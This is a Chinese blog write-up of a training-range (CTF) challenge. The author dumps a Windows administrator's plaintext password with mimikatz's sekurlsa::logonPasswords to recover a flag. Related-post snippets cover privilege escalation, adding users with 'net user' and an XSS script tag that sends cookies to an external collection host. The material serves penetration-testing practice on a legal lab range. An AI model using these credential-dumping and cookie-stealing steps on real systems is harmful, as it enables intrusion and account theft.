封神台 第六章:GET THE PASS!(进程中抓下管理员明文密码)

于 2022-10-21 22:28:02 发布
阅读量1k 收藏 2
点赞数 1
分类专栏: 封神台靶场 文章标签: 安全 web安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65712192/article/details/127436931
版权

封神台https://hack.zkaq.cn

一、题目

1.接着上一关,利用远程登录后看到有两个疑似藏有flag信息的文件。

 

2.试着打开却发现没有权限

 

 3.打开了txt文件的属性-安全-高级,把权限全部都改成允许。

可以读取txt了,解压密码是管理员密码

 

4. 打开zip文件发现需要解压密码,解压密码是管理员密码。

 

5.密码获取工具mimikatz(内网渗透神器),直接在文件里面搜索,双击exe打开。

 

6.输入命令

privilege::debuug ----提升权限
sekurlsa::logonPasswords----获取登陆用户密码

 

 

 7.获得密码wow!yougotit!

 8.用这个密码输入到小芳.txt

 

 FLAG {WOW!yougotit!}

橙子学不会.
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
获取目标服务器c盘下flag文件信息,公开课基础演练靶场 第六章 webshell控制目标详细解题思路...
weixin_42442653的博客
08-06 1076
我看见第六章的传送门上写着大大的两个字--提权!!在上一章,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘的文件。而C盘的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下...
神台----尤里的复仇I-第六章:SYSTEM!POWER!
正在学习的路上...
07-19 1471
通过上一章,上传的shell,使用菜刀连接 右键击 输入命令 whoami 权限不足,这里需要用到提权工具,工具在 就不用再上传了。 右键击cmd.exe,打开虚拟终端,输入whoami,可以看到当前用户。 尝试创建用户命令: net user 110 110 /add 还是权限不足。 这是因为cmd需要用到外部接口wscript.shell。 但是wscript.shell仍然...
mimikatz获取系统管理员账号明文密码工具
02-15
mimikatz 是一个来自法国的神器,能直接读取系统管理员密码明文,通杀xp win2003 win7 win2008,这个工具功能很强大,如果您能熟练运用它,就能体会到。
第六章:GET THE PASS
m0_48294281的博客
01-07 2265
靶场学习新的,欢迎一起交流!
神台在线靶场--尤里的复仇Ⅰ 小芳!【8题】
feiniaotjx的博客
10-20 9183
靶场练习 神台-掌控安全在线演练靶场 第一章:为了女神小芳!
技能进程管理员明文密码】结题思路
qq_33771823的博客
12-20 1041
神台 - 掌控安全在线演练靶场系列教程-第七章:GET THE PASS! 【技能进程管理员明文密码】结题思路 原文链接 本章重进程管理员明文密码! 在上一章,我已经通过用已经组装好的wscript.shell(iis6.exe)创建了一个administrators组成员,继续用此用户继续远程访问。 下载mimikatz并用菜刀上传mimikatz至服务器。注意路径绝对不能有文(可以有空格)!否则加载DLL的时候会报错:找不到文件。 在远程终端(3389、mstsc.exe
神台----尤里的复仇I-第七章:GET THE PASS
正在学习的路上...
07-19 1211
继续上一章的远程桌面连接,在C盘下找到这两个文件。 但是无权限打开。右键属性-安全。进行权限设置。 压缩包需要密码,文本里提示 使用minikatz工具,得到密码 命令:privilege::debuug ----提升权限 sekurlsa::logonPasswords----获取登陆用户密码 ...
神台靶场-第六章
Mr_helloword的博客
07-11 1286
第六章-SYSTEM!POWER! Tips: 1、提权! 2、FLAG在C盘根目录下! 1.在第五章的基础上用菜刀连接,根据提示查看flag,发现没有权限,这里想到提权,这是本章重( 注:如果途出现掉线,重新连接菜刀,或重新上传木马连接) 2.上传cmd.exe,iis6.exe文件(在upfile这里上传这俩个文件) 3.打开cmd命令,想法:创建管理员组新用户成员,奈何权限低。 whoami查看当前用户:发现为web应用服务组成员,权限低 我们想到还有一个iis6,我们查看该用户发现为syst
win下明文密码神器
weixin_30852451的博客
09-25 147
http://blog.gentilkiwi.com/mimikatz 转载于:https://www.cnblogs.com/googleyao/p/3992907.html
管理员密码神器--mimikatz
08-01
直接管理员明文密码,不用解密,利用简单,通杀Win
神台-杂项8:奇怪的短信
最新发布
03-11
随波逐流工具,一个非常好用的解码工具
(神榜大模型)是IDEA研究院认知计算与自然语言研究心主导的大模型开源体系,成为文AIGC和认知智能的基础设施
08-20
与此同时,文作为这个世界上最大的口语语种(母语者),却缺乏系统性的研究资源支撑,这使得文领域的研究进展相较于英文来说有些滞后。 为了解决文领域研究进展滞后和研究资源严重不足的问题,2021年11月...
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
更改支付金额(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
-:unity开发的FC神榜复刻版
02-13
在这款复刻版,开发者借助C#语言,充分挖掘了Unity引擎的强大功能,为玩家带来了全新的视觉体验和游戏玩法。 Unity引擎是目前全球广泛应用的游戏开发平台,支持2D和3D游戏制作,具有跨平台特性,可以在Windows、...
mbp 神台靶场 六(笔记)
qq_43558415的博客
02-09 1299
打开链接,根据题目提示,flag在c盘根目录下,接上一关的网页后台,打开c盘,发现确实存在flag.txt,但是提示没有权限。 于是知道本关需要我们去进行提权操作,打开D盘,发现cmd.exe和iis6.exe(如果没有可以上传),知道需要用Windows系统来进行操作,于是开启了虚拟机的windows 7,但还是打不开这个程序,原来是jre环境没装,便去java官网上下了最新版的jre,win...
神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
神台 - 掌控安全靶场】尤里的复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
神台靶场尤里的复仇I第一第二第五第六第七章解题思路(持续更新)
weixin_50549897的博客
01-02 4596
提示:文## 标题章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一 .第一章二.第二章1.引入库2.读入数据一 .第六章总结 提示: 本文按照靶场题目推进顺序进行,由于作者水平有限,有讲述不当之处敬请批评指出,有更好的解法欢迎在评论区发表。 本文将持续更新。靶场地址https://hack.zkaq.cn/battle 一 .第一章 **sql注入** 首先通过id=2判断是否存在sql注入 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021
尤里的复仇Ⅰ 小芳!
sparename的博客
08-23 293
尤里的复仇Ⅰ 小芳!第三章:为了更多的权限!留言板!判断是否为xss跨站脚本攻击查看cookie利用xss平台flag就在cookie里面第四章:进阶!拿到Web最高权限!修改为管理员cookie后请直接访问管理页面 准备好了吗?第五章:SYSTEM!POWER!第六章:GET THE PASS! 第三章:为了更多的权限!留言板! 判断是否为xss跨站脚本攻击 <script>alert(111)</script> 查看cookie <script>alert
c4d修神记:零基础到三维神 下载
01-05
"c4d修神记:零基础到三维神"是一本关于学习Cinema 4D(简称C4D)软件的书籍。C4D是一款强大的三维建模、动画和渲染软件,广泛应用于电影、游戏、广告等领域。该书以零基础的读者为目标群体,旨在通过系统的教程和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值